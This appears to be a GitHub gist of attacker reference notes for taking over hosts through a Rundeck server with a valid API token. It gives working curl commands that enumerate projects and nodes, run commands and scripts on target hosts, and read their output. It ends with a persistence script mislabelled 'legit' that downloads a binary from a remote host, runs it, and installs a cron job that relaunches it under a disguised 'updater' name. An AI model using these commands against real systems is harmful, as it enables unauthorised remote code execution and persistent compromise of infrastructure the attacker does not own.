Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Rundeck Takeover Reference

Rundeck Compromise

Reference notes to run commands on nodes controlled by Rundeck given a valid API token.

RUNDECK="https://host"
TOKEN="x-rundeck-auth-token:<secret>"

# Identify projects
curl -H $TOKEN $RUNDECK/api/16/projects/ -H accept:application/json | jq  .

# Identify resources/hosts in project
PROJECTNAME="<update>"
curl -H $TOKEN $RUNDECK/api/17/project/$PROJECTNAME/resources -H accept:application/json | jq  . 

# Run a command on your target host
TARGET="targethost"
CMDS="id; pwd; ls /var/lib; ps aux; w; curl -s ifconfig.co"
curl -H $TOKEN --data-urlencode "filter=name: $TARGET" --data-urlencode "exec=$CMDS"  -H "Accept: application/json" $RUNDECK/api/17/project/$PROJECTNAME/run/command

# Run a script on your target host
SCRIPT="script.sh"
curl -H $TOKEN --data-urlencode "filter=name: $TARGET" -F "scriptFile=@./$SCRIPT"   -H "Content-Type: multipart/form-data"  -H "Accept: application/json" $RUNDECK/api/17/project/$PROJECTNAME/run/script 

# Get output from commands run
ID="<Update with the ID output from the previous comand or script execution>"
curl -H $TOKEN -H "Accept: application/json" $RUNDECK/api/5/execution/$ID/output

# Abort execution
curl -H $TOKEN -H "Accept: application/json" $RUNDECK/api/11/execution/$ID/abort
# legit persistence script
#!/bin/bash
p="/home/rundeck/updater"
curl http://host/en/us/updater -o "$p" 
chmod +x "$p"
$p &

runsvc="/home/rundeck/updatesvc"
(crontab -l ; echo "* * * * * /bin/bash $runsvc")|crontab 2> /dev/null

cat > "$runsvc" << EOF
#!/bin/bash
if ! ps aux | grep '[u]pdater' | grep -v 'def' > /dev/null; then
    $p &
fi
EOF

chmod +x $runsvc

References https://docs.rundeck.com/docs/api/rundeck-api.html#running-adhoc-commands https://docs.rundeck.com/docs/api/rundeck-api.html#running-adhoc-scripts

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment